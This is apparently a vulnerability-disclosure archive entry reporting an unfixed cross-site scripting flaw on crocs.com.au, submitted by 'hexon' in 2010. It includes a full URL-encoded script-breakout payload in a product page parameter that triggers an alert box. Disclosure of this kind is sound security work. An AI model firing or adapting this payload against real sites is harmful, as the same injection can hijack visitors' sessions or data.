Security researcher hexon, has submitted on 11/04/2010 a cross-site-scripting (XSS) vulnerability affecting crocs.com.au, which at the time of submission ranked 961654 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 06/07/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 11/04/2010 |
Date published: 06/07/2010 |
Fixed? Mail us! | Status: UNFIXED |
Author: hexon |
Domain: crocs.com.au |
Category: XSS |
Pagerank: 961654 |
URL: http://crocs.com.au/product_detail.php?id=%27;//\%27;//%22;//\%22;//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3 CSCRIPT%3Ealert%28String.fromCharCode%2888,%20115,%20115,%20101,%20100,%2032,%2098,%20121,%2032,%207 2,%20101,%20120,%20111,%20110%29%29%3C/SCRIPT%3E&cid=11Y%27 |
Click here to view the mirror
|
|
|